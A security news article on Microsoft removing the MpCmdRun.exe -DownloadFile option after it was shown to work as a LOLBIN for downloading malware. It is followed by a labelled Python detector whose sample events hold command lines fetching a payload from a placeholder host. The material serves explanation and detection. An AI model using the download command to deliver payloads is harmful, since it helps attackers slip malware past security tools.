
Microsoft removed the file download command in Windows Defender Antivirus


Microsoft removed the ability to download files using Windows Defender after demonstrating how attackers can use this functionality to deliver malware to a computer.

We reported some time ago how Microsoft, for unclear reasons, covertly added the ability to download files using Microsoft Defender.

Following this, the cybersecurity research community expressed concern that Microsoft had effectively turned the Windows 10 antivirus into a LOLBIN (a legitimate OS binary that can be repurposed for malicious ends).

“With this new feature, Microsoft Defender is now part of the long list of Windows programs that can be abused by local attackers”, wrote BleepingComputer journalists.

To download files, users can use the antivirus service command line utility (MpCmdRun.exe) with the -DownloadFile argument, for example:

MpCmdRun.exe -DownloadFile -url [URL] -path [path to save file]

In BleepingComputer’s tests, the specialists were able to download arbitrary files, including ransomware, onto the test systems.

[Image: download function in Windows Defender]

If Windows Defender is active, it will quickly detect the threat, but other antivirus products may not flag a download performed by Microsoft’s own signed binary.

Answering an official request from BleepingComputer, Microsoft refused to explain why the functionality was added at all.

On September 17, Microsoft updated the antimalware client to version 4.18.2009.2-0 and again changed the functionality of the MpCmdRun.exe utility.

This time the company removed the ability to download files using the command line tool MpCmdRun.exe.

Users who try to download a file using MpCmdRun.exe now receive an error:

CmdTool: Invalid command line argument


The -DownloadFile command has now been removed from the utility help screen.
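As an added defender-side example (not code from the article, from BleepingComputer or from Microsoft), the following Python scans constructed process-creation records for the MpCmdRun.exe -DownloadFile pattern described above and checks whether a reported antimalware client version predates 4.18.2009.2, the build the article says removed the command. The expected Defender install directories, the Sysmon-style field names and the sample events are assumptions made for this example.

```python
# Added example: hunt for MpCmdRun.exe -DownloadFile in process-creation records
# and check whether a Defender client build still carries the option.
import shlex
from typing import Optional

FIXED_VERSION = (4, 18, 2009, 2)  # build that removed -DownloadFile (from the article)
# Where the genuine MpCmdRun.exe is expected to live (assumption made for this example)
EXPECTED_DIRS = ("c:\\program files\\windows defender\\",
                 "c:\\programdata\\microsoft\\windows defender\\platform\\")

def parse_version(ver: str) -> tuple:
    """'4.18.2009.2-0' -> (4, 18, 2009, 2); the '-0' revision suffix is ignored."""
    return tuple(int(part) for part in ver.split("-")[0].split("."))

def download_capable(ver: str) -> bool:
    """True when the client predates the build that dropped -DownloadFile."""
    return parse_version(ver) < FIXED_VERSION

def inspect_command_line(cmdline: str) -> Optional[dict]:
    """Return {'url', 'path'} if cmdline runs MpCmdRun.exe with -DownloadFile, else None."""
    try:
        argv = shlex.split(cmdline, posix=False)  # non-POSIX: backslashes stay literal
    except ValueError:                             # unbalanced quotes: crude fallback
        argv = cmdline.split()
    if not argv or not argv[0].strip('"').lower().endswith("mpcmdrun.exe"):
        return None
    lowered = [arg.lower() for arg in argv]        # the switch is case-insensitive
    if "-downloadfile" not in lowered:
        return None
    # Value following each switch of interest, with surrounding quotes removed
    values = {name: argv[i + 1].strip('"') for i, name in enumerate(lowered[:-1])
              if name in ("-url", "-path")}
    return {"url": values.get("-url"), "path": values.get("-path")}

def scan(events: list) -> list:
    """Flag matching events; a binary outside Defender's directories is extra suspicious."""
    findings = []
    for event in events:
        hit = inspect_command_line(event["CommandLine"])
        if hit is not None:
            hit["image"] = event["Image"]
            hit["image_outside_defender_dir"] = not event["Image"].lower().startswith(EXPECTED_DIRS)
            findings.append(hit)
    return findings

# Constructed sample records with Sysmon-style field names; not real telemetry.
DEFENDER = r"C:\Program Files\Windows Defender\MpCmdRun.exe"
SAMPLE_EVENTS = [
    {"Image": DEFENDER, "CommandLine": f'"{DEFENDER}" -SignatureUpdate'},
    {"Image": DEFENDER, "CommandLine": f'"{DEFENDER}" -DownloadFile -url http://files.example.invalid/payload.bin -path C:\\Users\\Public\\payload.bin'},
    {"Image": r"C:\Users\Public\MpCmdRun.exe",
     "CommandLine": r'C:\Users\Public\MpCmdRun.exe -downloadfile -url "http://files.example.invalid/a b.bin" -path "C:\Users\Public\a b.bin"'},
]
```

Feeding real process-creation telemetry through scan() only requires mapping its image and command-line fields onto the two keys used here.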

Cybercriminals take advantage of every tool available to them, especially those that are trusted automatically by the operating system and security software, such as signed Windows binaries.

LOLBIN attacks are not a theoretical concern.

“For example, LOLBINs were used by the TA505 team to carry out attacks using ransomware and other types of malware”, said information security experts.

The removal of the download option from Windows Defender is good news, as it takes one more avenue for compromising user systems away from attackers.

About the author: Vladimir Krasnogolovy